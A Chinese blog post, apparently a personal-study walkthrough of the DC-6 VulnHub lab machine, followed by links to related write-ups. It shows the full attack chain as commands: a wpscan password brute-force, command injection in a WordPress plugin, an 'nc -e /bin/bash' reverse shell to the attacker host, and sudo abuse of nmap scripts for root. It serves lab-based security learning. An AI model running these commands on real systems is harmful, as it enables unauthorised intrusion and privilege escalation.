DC-6靶机渗透测试过程(个人学习)

最新推荐文章于 2025-04-17 11:54:24 发布
最新推荐文章于 2025-04-17 11:54:24 发布
阅读量942 收藏 23
点赞数 16
文章标签: 学习 1024程序员节 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_59028058/article/details/143054226
版权

DC-6靶机下载地址:

        DC: 6 ~ VulnHub

攻击机kali的IP:192.168.37.131

靶机DC-6的IP:未知

一、信息收集

1、探测靶机的IP地址

        方法一:nmap 扫描

                        

        方法二:扫描局域网存活的IP

                          

2、探测目标靶机IP端口和服务

        使用命令扫描目标IP:

 nmap -O -A -p- 192.168.37.132

         

可以得到该靶机开放了22端口和80端口,直接访问80端口是访问不上的,这里和 DC-2 靶场一样,存在一个无法重定向的问题,所以我们修改一下 hosts 文件即可。

                        

成功访问网页后再查看该网页的框架之类的信息,通过Wappalyzer可以知道CMS为WordPress

                

3、目录扫描

        在kali中可以使用dirb命令扫描该网站,也可以利用dirsearch爆破网站获取信息

dirb http://wordy

dirsearch -u http://wordy

                

对扫描出的网站点击进入,页面会自动跳转到了一个后台登陆的网页

                

二、web渗透

1、暴力破解

拿到了一个后台登陆页面,首先进行弱口令登录一下,发现并不行,抓包使用burp尝试爆破也无果。前面通过信息收集查看网站指纹,知道CMS为WordPress,可以使用针对该CMS的账号爆破工具wpscan,可以利用 -e u参数来枚举用户:

wpscan --url http://wordy -e u

可以得到六个用户名,将他们保存到 usr.txt 文件中,再利用我们自己的字典对其进行爆破,但是需要一个比较大的字典才会有破解的可能性。在我们下载镜像靶场的时候,作者其实已经对我们进行了提示,存在着一个字典,可能会帮助我们减少很多时间,所以可以直接利用自带的字典进行爆破

                        

将自带的字典文件复制到桌面中,使用命令进行爆破:

wpscan --url http://wordy -U usr.txt -P rockyou.txt

                ​​​​​​​        

因为字典很大, 爆破所需要的时间过于漫长了,最后可以得到了 mark 用户的密码为helpdesk01

用这个账号密码登录

        ​​​​​​​        ​​​​​​​        

进入后台后每个模块都可以翻阅一下试试是否存在漏洞,在 usrs 一栏一中可以发现存在一个flag1

2、命令执行漏洞

在Activity monitor 插件中,在 Tools 中存在着一个注入点,这里输入IP或者数字,然后将用户的输入传到后台解析

        ​​​​​​​        ​​​​​​​        

尝试输入命令看看是否能被解析,可以发现能够进行命令执行。

3、nc建立反弹shell

但是在这个文本框中存在长度限制,我们可以选择修改前端或者抓包更改数据包,在kali中利用 nc 

监听一个端口进行建立反弹shell

nc -lvvp 6666

        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        

开启侦听后通过抓包更改文本框中的数据反弹shell

nc -e /bin/bash 192.168.37.131 6666

发包过后可以发现 shell 已经回传到了kali上

可以利用python建立一个交互式的界面

python -c 'import pty;pty.spawn("/bin/bash")'        ​​​​​​​        ​​​​​​​        ​​​​​​​                        

flag2的位置可以利用 find 命令来查找,可以发现flag2 在网页中,但是我前面没有找到

find / | grep flag2

查看flag2内容

获取 /etc/passwd 文件的内容可以得到flag3的内容

在home目录下,可以发现四个目录信息,分别查看四个目录,在jens目录下,存在一个压缩包和一个 .sh 脚本

在mark目录下中的stuff文件中的一个文本文档,发现 graham用户的密码

可以利用ssh连接,登录graham用户

ssh graham@192.168.37.132 

在 graham 的家目录下,可以发现存在四个隐藏文件

分别进行查看可以发现在 .bash_history 有一个查看suid权限内容的命令

复制命令进行执行,发现可以利用 su 和 sudo 命令

使用 sudo -l 命令查看 graham 用户在使用sudo时的权限和可执行的命令,可以发现这里还可以以jens身份执行反弹shell脚本。

猜想如果用jens用户反弹shell,反弹回的则是jens用户的shell

在kali中开启nc监听5555端口

nc -lvvp 5555

再更改 backups.sh 的IP与端口指向 kali 的IP和开放的端口

最后 sudo 以 jens 用户的身份执行脚本反弹shell,成功连接后在利用python建立一个交互式界面利于查看

4、nmap提权

进入了 jens 用户再利用 sudo -l 查看 jens 使用 sudo 时的权限和可执行的命令,发现 jens 用户可以以 root 用户的身份执行 nmap

搜索一下如何利用nmap来提权

nmap 提权分为两种

旧版本上以进入交互式界面

nmap --interactive #进入 nmap 交互式界面

!sh  #执行sh,交互成功

但是再 5.20版本之后nmap就没有交互式界面, 利用代码执行来获取到root权限

echo 'os.execute("/bin/sh")' > /tmp/test
sudo nmap --script=/tmp/test

查看这里的nmap的版本,版本为7.40,所以只能利用代码来获取root权限

执行命令便可以得到root权限

切换到root目录下即可获得到flag4

.M1ke.
关注
DC-6靶机进行渗透测试
zll___的博客
03-20 1041
DC-6靶机进行渗透测试
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3282
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-6靶场渗透
一纸荒芜的博客
01-16 1505
DC6靶场渗透
DC系列靶场---DC 6靶场的渗透测试
zhouA0221的博客
08-07 1163
使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的。5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码。
DC-6 靶机渗透实战笔记
最新发布
syg6921008的博客
04-17 748
信息收集与初始突破:通过域名识别和 WordPress 渗透实现初始访问。用户口令弱点与爆破:WordPress 用户弱口令爆破拿下后台访问权限。插件漏洞利用:借助插件中命令注入实现 RCE 并反弹 shell。横向移动与文件分析:利用残留文件中的账号信息,实现横向用户转换。脚本配置不当:通过备份脚本反弹 shell 到 jens 用户。Nmap NSE 脚本提权:利用 sudo 权限下的 Nmap 执行恶意 Lua 脚本获得 root shell。此靶机综合考查了。
DC6-靶机渗透
banacyo14206的博客
08-22 600
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
渗透测试DC-6靶机
Ciyaso的博客
08-21 349
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
DC-6靶机渗透
m0_62008601的博客
05-31 658
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-6靶机渗透测试
来日可期的博客
08-13 1409
用一句大白话来说,Activity Monitor类似Windows中的任务管理器,可以实时查看进程占用的CPU、内存的使用量。用一句大白话来说,Activity Monitor类似Windows中的任务管理器,可以实时查看进程占用的CPU、内存的使用量。进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现是graham用户及登录密码。找到mark用户的家目录下的stuff文件夹,查看里面的things-to-do.txt。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1342
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1459
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1090
*4.rbash提权**
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1617
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-6靶机渗透测试详细教程
啊醒的博客
05-04 3249
DC-6靶机渗透测试详细教程
DC6-靶机
Au
10-30 1769
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
dc-6 靶机渗透学习
..
03-21 1849
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 1063
DC-6靶机详细渗透过程
DC-6靶机测试渗透详细教程
wwxxss
10-26 1407
DC-6的靶场详细渗透过程
DC系列(6DC-6靶机渗透
Nikris的博客
01-12 4407
DC6
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值